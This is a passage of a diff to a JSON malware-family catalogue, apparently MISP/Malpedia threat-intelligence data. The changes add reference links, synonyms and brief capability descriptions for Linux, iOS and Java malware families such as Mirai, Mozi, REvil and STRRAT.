"https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", - "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", + "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", + "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", + "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", + "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", - "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet" + "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", + "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", + "https://isc.sans.edu/diary/22786", + "https://github.com/jgamblin/Mirai-Source-Code", + "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants", + "https://www.youtube.com/watch?v=KVJyYTie-Dc", + "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", + "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai", + "https://synthesis.to/2021/06/30/automating_string_decryption.html", + "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", + "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", + "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/" ], "synonyms": [ "Katana" @@ -3270,13 +3907,27 @@ "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.momentum", + "https://www.trendmicro.com/en_us/research/19/l/ddos-attacks-and-iot-exploits-new-activity-from-momentum-botnet.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aaf8ce1b-3117-47c6-b756-809538ac8ff2", + "value": "Momentum" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot", "https://blog.netlab.360.com/ddos-botnet-moobot-en/", - "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/" + "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/", + "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b" ], "synonyms": [], "type": [] @@ -3305,9 +3956,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi", + "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet", "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", - "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", - "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/" + "https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/", + "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/", + "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/", + "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/", + "https://blog.netlab.360.com/mozi-another-botnet-using-dht/" ], "synonyms": [], "type": [] @@ -3329,7 +3984,7 @@ "value": "MrBlack" }, { - "description": "", + "description": "Ransomware used against Linux servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nextcry", @@ -3339,7 +3994,7 @@ "type": [] }, "uuid": "7ec8a41f-c72e-4832-a5a4-9d7380cea083", - "value": "Nextcry Ransomware" + "value": "Nextcry" }, { "description": "", @@ -3356,6 +4011,20 @@ "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242", "value": "Ngioweb (ELF)" }, + { + "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.niub", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec", + "value": "NiuB" + }, { "description": "FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.", "meta": { @@ -3410,6 +4079,19 @@ "uuid": "cc48c6ae-d274-4ad0-b013-bd75041a20c8", "value": "p0sT5n1F3r" }, + { + "description": "P2P botnet derived from the Mirai source code.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot", + "https://www.cert.org.cn/publish/main/11/2021/20210628133948926376206/20210628133948926376206_.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7aff049d-9326-466d-bbcc-d62da673b32c", + "value": "pbot" + }, { "description": "", "meta": { @@ -3439,9 +4121,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf", + "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/", "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://twitter.com/Nocturnus/status/1308430959512092673", + "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/" ], "synonyms": [ @@ -3483,13 +4167,44 @@ "uuid": "de3c14aa-f9f4-4071-8e6e-a2c16a3394ad", "value": "PLEAD (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prism", + "https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar" + ], + "synonyms": [ + "waterdrop" + ], + "type": [] + }, + "uuid": "9a4a866b-84a9-4778-8de8-2780a27c0597", + "value": "PRISM" + }, + { + "description": "Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.privet_sanya", + "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "41e5aafb-5847-421e-813d-627414ee31bb", + "value": "PrivetSanya" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei", - "https://twitter.com/IntezerLabs/status/1338480158249013250", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities", + "https://cujo.com/iot-malware-journals-prometei-linux/", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://twitter.com/IntezerLabs/status/1338480158249013250", "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], @@ -3533,11 +4248,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", + "https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/", "https://www.anomali.com/blog/the-ech0raix-ransomware", "https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/", "https://www.qnap.com/en/security-advisory/QSA-20-02", "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/", + "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/", + "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/", "https://www.ibm.com/downloads/cas/Z81AVOY7" ], "synonyms": [ @@ -3598,12 +4316,19 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx", "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195" + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/" ], "synonyms": [ "Defray777" @@ -3672,6 +4397,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe", "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/", "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", "https://vms.drweb.com/virus/?i=7754026&lng=en" ], "synonyms": [], @@ -3693,6 +4419,37 @@ "uuid": "934478a1-1243-4c26-8360-be3d01ae193e", "value": "reptile" }, + { + "description": "ELF version of win.revil targeting VMware ESXi hypervisors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", + "https://github.com/f0wl/REconfig-linux", + "https://www.youtube.com/watch?v=ptbNMlWxYnE", + "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://twitter.com/VK_Intel/status/1409601311092490248", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", + "https://twitter.com/VK_Intel/status/1409601311092490248?s=20", + "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", + "https://threatpost.com/ransomware-revil-sites-disappears/167745/" + ], + "synonyms": [ + "REvix" + ], + "type": [] + }, + "uuid": "d9d76456-01a3-4dcd-afc2-87529e00c1ba", + "value": "REvil (ELF)" + }, { "description": "", "meta": { @@ -3733,11 +4490,27 @@ "uuid": "e18bf514-b978-4bef-b4d9-834a5100fced", "value": "Roboto" }, + { + "description": "RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021.\r\nThe malware uses rotating encryption to encrypt the resource information within the sample, and C2 communication, using a combination of AES, XOR, ROTATE encryption and ZLIB compression.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro", + "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/", + "https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro", + "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "66fb7b48-60f2-44fc-9cbe-f70e776d058b", + "value": "RotaJakiro" + }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", + "https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/", "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", @@ -3897,6 +4670,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi", "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", "https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/" ], "synonyms": [], @@ -3931,16 +4705,40 @@ "uuid": "5c117b01-826b-4656-b6ca-8b18b6e6159f", "value": "sustes miner" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.suterusu", + "https://www.lacework.com/blog/hcrootkit-sutersu-linux-rootkit-analysis/" + ], + "synonyms": [ + "HCRootkit" + ], + "type": [] + }, + "uuid": "d2748a0c-8739-4006-95c4-bdf6350d7fa9", + "value": "Suterusu" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", "https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool", - "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", - "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", + "https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials", + "https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server", + "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf", + "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment", + "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/", + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt", + "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera", + "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", + "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/", + "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/", + "https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools" ], "synonyms": [], "type": [] @@ -3967,7 +4765,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger", - "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", + "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/" ], "synonyms": [], "type": [] @@ -4015,6 +4814,7 @@ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://twitter.com/ESETresearch/status/1382054011264700416", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" ], "synonyms": [], @@ -4041,12 +4841,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://blog.aquasec.com/fileless-malware-container-security", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "http://get.cyberx-labs.com/radiation-report", + "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/", "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf", + "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/" ], "synonyms": [ "Amnesia", @@ -4087,7 +4892,7 @@ "value": "Umbreon" }, { - "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in linux email servers. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.", + "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001", @@ -4100,17 +4905,32 @@ "value": "Unidentified Linux 001" }, { - "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", + "description": "This is an implant used by APT31 on home routers to utilize them as ORBs.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002", - "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/" + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_003", + "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003", + "https://twitter.com/billyleonard/status/1417910729005490177", + "https://twitter.com/bkMSFT/status/1417823714922610689" ], "synonyms": [], "type": [] }, - "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec", - "value": "Unidentified Linux 002" + "uuid": "c2866996-d622-4ee2-b548-a6598836e5ae", + "value": "Unidentified ELF 003" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike", + "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4ded098-be7b-4852-adfd-8971ace583f1", + "value": "Vermilion Strike (ELF)" }, { "description": "", @@ -4124,6 +4944,7 @@ "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", @@ -4176,17 +4997,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", - "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://community.riskiq.com/article/541a465f/description", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], @@ -4253,7 +5079,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe", - "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html" + "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775" ], "synonyms": [], "type": [] @@ -4292,6 +5119,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/", "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/", @@ -4300,9 +5128,10 @@ "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html", "https://en.wikipedia.org/wiki/Xor_DDoS", "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/", - "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/", + "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" ], "synonyms": [ @@ -4313,6 +5142,19 @@ "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", "value": "XOR DDoS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zhtrap", + "https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d070ff73-ad14-4f6b-951f-1645009bdf80", + "value": "ZHtrap" + }, { "description": "", "meta": { @@ -4386,6 +5228,21 @@ "uuid": "8a1b524b-8fc9-4b1d-805d-c0407aff00d7", "value": "lightSpy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.phenakite", + "https://malware4all.blogspot.com/2021/05/grab-your-own-copy-phenakite-ios.html" + ], + "synonyms": [ + "Dakkatoni" + ], + "type": [] + }, + "uuid": "7ba7488c-b153-4949-8391-bcf6c4b057bd", + "value": "Phenakite" + }, { "description": "", "meta": { @@ -4403,6 +5260,19 @@ "uuid": "7982cc15-f884-40ca-8a82-a452b9c340c7", "value": "PoisonCarp" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.postlo", + "https://twitter.com/opa334dev/status/1374754519268098051" + ], + "synonyms": [], + "type": [] + }, + "uuid": "25bff9ad-20dc-4746-a174-e54fcdd8f0c1", + "value": "Postlo" + }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { @@ -4437,6 +5307,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", "https://research.checkpoint.com/malware-against-the-c-monoculture/", "http://malware-traffic-analysis.net/2017/07/04/index.html", @@ -4519,6 +5390,19 @@ "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, + { + "description": "EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string \"_packet_\" as a packet delimiter.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.epicsplit", + "https://www.zscaler.com/blogs/security-research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat" + ], + "synonyms": [], + "type": [] + }, + "uuid": "90b304a2-452a-4c74-ae8d-80d9ace881a4", + "value": "EpicSplit RAT" + }, { "description": "", "meta": { @@ -4687,11 +5571,15 @@ "value": "Ratty" }, { - "description": "", + "description": "According to G DATA, STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird. \r\n\r\nOlder version of the malware came with a rudimentary ransomware module that appends \".crimson\" to affected files. The affected files are not 